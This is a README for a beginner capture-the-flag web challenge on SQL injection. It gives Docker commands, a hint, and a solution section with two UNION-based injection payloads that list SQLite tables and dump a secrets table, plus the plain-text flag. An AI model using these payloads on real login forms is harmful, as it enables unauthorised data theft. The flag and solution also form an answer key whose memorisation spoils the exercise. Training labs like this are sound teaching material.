# Web Easy - Sql Injection
## Description
sql-injection challenge.

## Author(s)
- RPScylla

## ToDo:
- Better CTFd text

## How to build/host
- Docker image
- Text instructions on CTFd
- Hint on CTFd

### Docker compile commands
```
sudo docker build --rm -t sql-injection .
sudo docker run -d -it --rm -p 8080:80 sql-injection
```

### Text instructions
> Can you login?

### Hint
> What kind of database is it?

## Solution
<details>
<summary>Click to show</summary>
<p>

- <pre><code>' union SELECT `name`,`sql`,'','' from `sqlite_master` --</code></pre>
- <pre><code>' union SELECT `name`,`secret`,'','' from `secrets` --</code></pre>

</p>
</details>

### Flag
PTH{5ql173_1nj3c710n_15_c00wl}